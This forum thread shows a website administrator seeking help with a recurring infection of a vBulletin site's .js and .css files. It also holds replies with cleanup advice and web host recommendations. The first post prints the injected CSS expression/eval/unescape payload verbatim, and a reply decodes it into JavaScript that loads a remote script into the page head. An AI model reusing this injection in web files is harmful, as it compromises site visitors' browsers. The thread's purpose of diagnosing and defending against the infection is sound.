My website keeps getting infected with a virus...

[Killer3737]

Ok so i run the site www.foofighterslive.com, and several files on our webspace keep getting infected with the following virus, according to various virus programs:

exploit-PHPBB.b

AKA:
* JS/Redirector.A [Norman]

* JS/Redirector.E [NOD32v2]

* JS_REDIRECTOR.M [TrendMicro]

* Trojan.JS.Redirector.C [BitDefender]

* Trojan.JS.Redirector.e [Kaspersky]

* Trojan.Redirect.10 [DrWeb]


I clean the files and it's fine for about a week, then it comes back. It used to be .js files that were being infected with malicious code, now it seems to be .css files aswell. They cause my forum to stop fully functioning, but what's confusing is that this virus seems to be related to PHPBB forum software, when we are running VBB forum software, so finding a fix via google is hard, because all the answers point to PHPBB software. This is the code that they keep embedding in the files:

Code:

 /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%37%33%35%39%34%3B%20%4A%53%53%33%20%3D%20%27%2F%77%69%6B%69%2F%73%6B%69%6E%73%2F%63%6F%6D%6D%6F%6E%2F%69%6D%61%67%65%73%2F%6F%70%61%64%61%72%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%77%69%6B%69%2F%73%6B%69%6E%73%2F%63%6F%6D%6D%6F%6E%2F%69%6D%61%67%65%73%2F%6F%70%61%64%61%72%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */

I assume that is some sort of scrambled code, i don't really understand it. Anyone know how i can stop these exploits from coming back? How the hell do they keep managing to access these files?

[SCDVD]

Contact your host provider and explain the problem. If they can't give a solid answer and effective help, find another host for your web site. You should post your host provider's name. It's possible that other forum members may have some insight about them.

[aedipuss]

somewhere on your site you probably have an unfiltered input statement that is allowing them to hack your site.


google -

body { margin-top: expression(eval(unescape

and

htmlentities() - to help fix it

[jagabo]

That code translates to:

Code:

if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 573594; JSS3 = '/wiki/skins/common/images/opadar/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src'' '/wiki/skins/common/images/opadar/check.js'); js.setAttribute('id'' 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };

[isogonic]

are you using the latest version, missing any patches or updates to it?

[jagabo]

AVG antivirus also identifies and quarantines it as "Virus identified exploit".

[usually_quiet]

The code posted infects computers running Internet Explorer. Just viewing this post causes sets ofF my antivirus. How about removing the code sections?

[thecoalman]

It's plain text here so it can't do anything.

You're either being infected through a exploit in the software on your server like Cpanel amongst others or software you have installed yourself like phpbb.

If you are running the latest version of phpbb3 or phpbb2 there are no known exploits in the wild.

If you feel its a phpbb issue you can report it here: http://www.phpbb.com/incidents/

[Killer3737]

It's not a PHPBB problem for the simple reason that we don't run that forum software and never have. We have VBulletin software.

Anyway i've asked the website owner to contact the host and see what they can do, but i'll look this up some more via google.

EDIT: Oh also

That code translates to:

Code:

if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 573594; JSS3 = '/wiki/skins/common/images/opadar/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src'' '/wiki/skins/common/images/opadar/check.js'); js.setAttribute('id'' 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };

Those pages it's referring to have long been removed from the site, and the database for the wiki is also gone, so how are they still using those files?

EDIT2: Actually, i see just those files have re-appeared in the directory, and keep doing so even after deleting them. Hmm...

[lordsmurf]

Permissions on server?

[aedipuss]

check your site access/secure user logs. your site sounds like it's "owned". they can be using it for denial of service attacks / mass spamming / hosting warez, etc.

[jagabo]

I ran that code on a virtual machine running an unprotected XP and IE. It seems to force IE to use intranet security settings for extranet access.

[SCDVD]

As I said above, contact you host service provider and ask for their assistance with this. If they are reputable, they will be all over this like stink on the pile. If they aren't responsive, you know everything you need to know about them. If you aren't satisfied with their response, move your site to another host. If your site / host service provider have been targeted by someone to attack, you need to be more aggressive about dealing with this than just playing with scripts and access. Some of these thugs are a lot more competent than any advice you are going to get here.

[Killer3737]

As I said above, contact you host service provider and ask for their assistance with this. If they are reputable, they will be all over this like stink on the pile. If they aren't responsive, you know everything you need to know about them. If you aren't satisfied with their response, move your site to another host. If your site / host service provider have been targeted by someone to attack, you need to be more aggressive about dealing with this than just playing with scripts and access. Some of these thugs are a lot more competent than any advice you are going to get here.

I have done that, thanks. Well, i haven't, but i have asked the owner to do so as a matter of urgency. The site is hosted by 1&1, so i'm sure they will be able to do something about it.

Thanks

[thecoalman]

It's not a PHPBB problem for the simple reason that we don't run that forum software and never have

.

I understand now, the vulnerability was most likely named that because it was used to first exploit phpbb however many things introduced to exploit phpbb generally can work on other software. When these exploits are found they are sometimes not specific to one application.

We have VBulletin software.

If that is not up to date it will have exploits too. You need to keep any installation like that up to date or you're risking getting hacked. If you have a Wiki or anything else installed I'd go over everything you have and make sure you're running the latest.

As I said above, contact you host service provider and ask for their assistance with this. If they are reputable, they will be all over this like stink on the pile. If they aren't responsive, you know everything you need to know about them.

Really depends on the plan and what the issue is, if the vulnerability is in a script like phpbb or VB then it's his responsibility. If it's VPS or dedicated server you're only going to get support if you have a managed one and even then it's generally limited.

[Killer3737]

vBulletin is and always has been updated to the latest version. As i said earlier, we DID have a wiki, but it was deleted along with the database for it. However, those files still keep reappearing.

[thecoalman]

if it isn't software you installed then its server software which would be the responsibility of your host assuming your on limited shared hosting plan. As stated by many people above contact them.

[aedipuss]

killer3737 all it takes is one unfiltered input anywhere on the site. do you have a form people fill out with name, password, email address, etc., anywhere on the site?

[Killer3737]

killer3737 all it takes is one unfiltered input anywhere on the site. do you have a form people fill out with name, password, email address, etc., anywhere on the site?

On the site itself no, the only form like that is within vbulletin. Anyway, this is with 1&1 now, we're waiting for their response.

[Killer3737]

Godamn, contacted 1&1, they say they won't perform the analysis, and say i need to set up an antivirus on the server. However, the server is Linux, and I need a SSH access to set it up, though our contract does not include SSH access.

Time to move on i guess, but how can i make sure we don't have a vunrebility on the site and don't get attacked again?

[handyguy]

My phpBB was hacked once but that's cause it was out of date. Put in an updated one & it's fine.

Also, get a new host. You see, every website on that host is now infected I bet.

[lordsmurf]

1&1 has to be one of the most worthless hosts on the planet. Run away. Fast.

[Killer3737]

1&1 has to be one of the most worthless hosts on the planet. Run away. Fast.

Yeah, that's something we have come to realise since going with them in Feb. 2006. Not really the right place, but any recommendations? I've been looking at a few, but a lot of them have a 'too good to be true' mantra about them. Hostmonster and Bluehost for example.

Also to go back to my last question, is there any easy way to check my site code for vunribilites? I didn't originally code it myself, and i don't know that much about it. I'm pretty sure the original problem was with part of the wiki, which is no longer part of the website and wouldn't be transferred

[SCDVD]

I don't know but I bet there are web sites where hosting companies are reviewed and rated. Maybe someone here knows of rating sites for hosting companies.

[thecoalman]

but a lot of them have a 'too good to be true' mantra about them. Hostmonster and Bluehost for example.

Any hosting package with 6 gazillion GB's of storage and bandwidth is just a gimmick. these are usually in the $5 to $10 range. It's shared hosting and they know that 99% of the poeple that purchase them will never even come close to using those resources. The hidden limits specifically CPU usage are where the true limits of these packages are. Anything dynamic like a forum, blog, wiki etc is going to use CPU.


Having said that get a starter VPS: http://www.jaguarpc.com/forums/showthread.php?t=20278

Every JaguarPC Managed VPS Hosting plan includes:
+ Quad core Nodes
+ Large RAID10 drive arrays - great I/O disk performance
+ Full root/adminstrator access
+ JagPC Fully Managed Support + 24x7
+ 30 Day Money Back Guarantee
+ FREE Daily backups via large R1Soft ECDP NAS appliances
+ FREE Moving assitance and data transfer for moves
+ Choice of OS: CentOS, Debian, Fedora Core, Suse.
+SPECIAL+ Extra 100% FREE: Diskspace for life on every plan
+SPECIAL+ Extra 75% FREE: Ram for life on every plan
+SPECIAL+ Extra 100% FREE: Bandwidth for life on every plan
+SPECIAL+ FREE Plesk 10 domain control panel on every plan!!!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Linux VPS HOSTING PLANS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DISCOVERY PLAN
10GB Diskspace + 100% FREE = 20GB
128MB RAM Guaranteed + 75% FREE = 224MB
150GB Bandwidth+ 100% FREE = 300GB
$19.97/month

Also to go back to my last question, is there any easy way to check my site code for vunribilites?

1. If you're using any software like VB I'd start with fresh files. Check any other files that user can input information such as contact forms etc. you have to validate all input.

2. Search though your entries for any suspicous code.

[handyguy]

You could use a website checker, there are websites that do it that for free. I don't know if they scan that kind of code.

[aedipuss]

the exploit-PHPBB.b i s a general exploit of PHP not PHPbb. any web server using unpatched/non-updated PHP can be exploited. mySQL is another exploitable host program. if the hosting company isn't on top of the patches, all their hosted sites can be infected/owned.

the first thing i would do is change your root site access/hosting password(if you still can). then take the site down and delete all files off of the server. only upload a known clean version of the site, not a backup from the hosted site. don't install anything that accepts input until you have checked it and made sure it filters all input.

like coalman says, unless you do a line by line check of your code, and filter all inputs you are vulnerable.

[lordsmurf]

I highly suggest www.EuroVPS.com as a host. Connection times to North America are often faster than cheap servers in the USA. Support is easily one of the best in the industry. Prices are very reasonable compared to resources and support quality.

[stiltman]

I've been using www.afmu.com for about 3 years now. Great customer service and support. I only needed support once though